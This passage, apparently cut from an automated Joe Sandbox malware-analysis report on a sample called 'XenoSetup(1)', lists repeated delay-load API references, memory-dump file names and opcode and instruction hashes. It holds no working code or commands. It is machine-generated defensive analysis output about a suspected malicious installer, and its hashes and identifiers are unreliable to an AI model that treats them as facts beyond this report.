                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 12b1f3c397813a7563621803741307086e67c0bd8c306bff0e8b09e5bf78069f
                                                                                      • Instruction ID: 5153756edcbda3589299af5e3d80f155fa997dc39d1fdd87aabe19a025338d42
                                                                                      • Opcode Fuzzy Hash: 12b1f3c397813a7563621803741307086e67c0bd8c306bff0e8b09e5bf78069f
                                                                                      • Instruction Fuzzy Hash: DEB012E22982647D3108A1055E06D77020CD9C4F20330D52EF745C9074D8445C092833
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE580
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 056d933643cd2c79c93901cd72598113a95cc47361806403638014b211a1f1d7
                                                                                      • Instruction ID: 7aa922449967c5e1b4ce4c23a9743c9e0bf3de3f142bd9b051daff9dfbd0c898
                                                                                      • Opcode Fuzzy Hash: 056d933643cd2c79c93901cd72598113a95cc47361806403638014b211a1f1d7
                                                                                      • Instruction Fuzzy Hash: 19B012C22983187D304461559D03D37012CD9C4F20338562EF545CD074E8445C502431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE580
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 35baa1123cbf95b00a0b5b229e054a28dca92d1eed620719967b6af07a9e5782
                                                                                      • Instruction ID: 9cf01b6eeb6e71d0de5df7b02a54e8309b50e978d2225d7f2c2695dfb3372a7e
                                                                                      • Opcode Fuzzy Hash: 35baa1123cbf95b00a0b5b229e054a28dca92d1eed620719967b6af07a9e5782
                                                                                      • Instruction Fuzzy Hash: 77B012C22982187D300461559E02D37012CD9C4F20338562EF545CD074EC445C112431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE580
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 25561b902e21f53548e36236fee2adb4e84ec6796b625bdc50ecc676e25e4b05
                                                                                      • Instruction ID: 24c3426d17a56322aaf9ce52c622b13804e79de3f82c2e7a1696b4bda9b591e4
                                                                                      • Opcode Fuzzy Hash: 25561b902e21f53548e36236fee2adb4e84ec6796b625bdc50ecc676e25e4b05
                                                                                      • Instruction Fuzzy Hash: FAB012C229821C7E300871555D02D37011CE9C4F20334542EF545CD074E8445C102431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: f6cf9fbed3af31bd75519162263ac1af8d26adb3719b7da8b9d9189558b9e054
                                                                                      • Instruction ID: 6bdbfefa171c0af6d9b4d1e32c1d0daff312e87a2c02ab0ea7ab05fff34b85e4
                                                                                      • Opcode Fuzzy Hash: f6cf9fbed3af31bd75519162263ac1af8d26adb3719b7da8b9d9189558b9e054
                                                                                      • Instruction Fuzzy Hash: 00B012C26992147D320461099D03D3B010CD9C5F20334572EF545C8079E8486C442431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: ac32695c09cf1200c0579e940da2dbc8de74cb62fc453a678991fdc0f71ff0ee
                                                                                      • Instruction ID: 9b7f1b22741449002e9318c1ddb8334fdba11ef3f4a03db6d02be1d5619d7ab1
                                                                                      • Opcode Fuzzy Hash: ac32695c09cf1200c0579e940da2dbc8de74cb62fc453a678991fdc0f71ff0ee
                                                                                      • Instruction Fuzzy Hash: D1B012C26991147E310871095D02E3B010CE9C5F20334552EF545C8079E8485C002431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 6fd122c4b20116737bec7e8992e0cf9ae43ef8ad13bebc8ece90d662fe5a325a
                                                                                      • Instruction ID: 210ff32bf43e08e2b334091ce687b705f4b72c9f0aa99f869e8bd22adc5c4249
                                                                                      • Opcode Fuzzy Hash: 6fd122c4b20116737bec7e8992e0cf9ae43ef8ad13bebc8ece90d662fe5a325a
                                                                                      • Instruction Fuzzy Hash: 94B012C26991547D320871095E02D3B050CD9C5F20334952EF645C8079E8485C012431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 1b83f6b1ff9ccaa108b2b66604e8562362846d16d10198885ca051252383c87d
                                                                                      • Instruction ID: c6c10d669835a8c5e7c58033e7f8b4170af03aae519747006fd68f632c57c19b
                                                                                      • Opcode Fuzzy Hash: 1b83f6b1ff9ccaa108b2b66604e8562362846d16d10198885ca051252383c87d
                                                                                      • Instruction Fuzzy Hash: EEB012C26991147D310421255D06E3B010CEDC1F20334553EF591C847BE8485C042431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 6ee6cc922fe64c115fc612cc441e80caf2c5735778b425103e83270f45ff8688
                                                                                      • Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
                                                                                      • Opcode Fuzzy Hash: 6ee6cc922fe64c115fc612cc441e80caf2c5735778b425103e83270f45ff8688
                                                                                      • Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 7ff63c464f995dcba027e6f32c3c064db34e9916b3dbd30046cbf6940002f944
                                                                                      • Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
                                                                                      • Opcode Fuzzy Hash: 7ff63c464f995dcba027e6f32c3c064db34e9916b3dbd30046cbf6940002f944
                                                                                      • Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: f84f157993412f7cd2fed1a70f440c6eef4c708df033bf4eb47055ec0d863ade
                                                                                      • Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
                                                                                      • Opcode Fuzzy Hash: f84f157993412f7cd2fed1a70f440c6eef4c708df033bf4eb47055ec0d863ade
                                                                                      • Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 8a6597262aa8938b14d9724d752cb6822da63fe58b0bc13423161ac83273a3da
                                                                                      • Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
                                                                                      • Opcode Fuzzy Hash: 8a6597262aa8938b14d9724d752cb6822da63fe58b0bc13423161ac83273a3da
                                                                                      • Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: a7c781ca0481dc7d52546a18a8148b6466e1fa4c7c7386cad2e678329bb21916
                                                                                      • Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
                                                                                      • Opcode Fuzzy Hash: a7c781ca0481dc7d52546a18a8148b6466e1fa4c7c7386cad2e678329bb21916
                                                                                      • Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 84299d3a73d59b42108fb3003d7325af3f80db8dea3151a0c877188f722ef42a
                                                                                      • Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
                                                                                      • Opcode Fuzzy Hash: 84299d3a73d59b42108fb3003d7325af3f80db8dea3151a0c877188f722ef42a
                                                                                      • Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 81f0fe9ef69c0bdd273e350225d7bc9ad56b565910c8d212c92e8878d0833fa0
                                                                                      • Instruction ID: fda98e4cac36083935aa423cde2a83ca93fcec6e26fda27157cd9e0fae5c6b51
                                                                                      • Opcode Fuzzy Hash: 81f0fe9ef69c0bdd273e350225d7bc9ad56b565910c8d212c92e8878d0833fa0
                                                                                      • Instruction Fuzzy Hash: A1A012D2198105BC311421031D02C37120CC9C0F60330442DF903C4070684458402430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
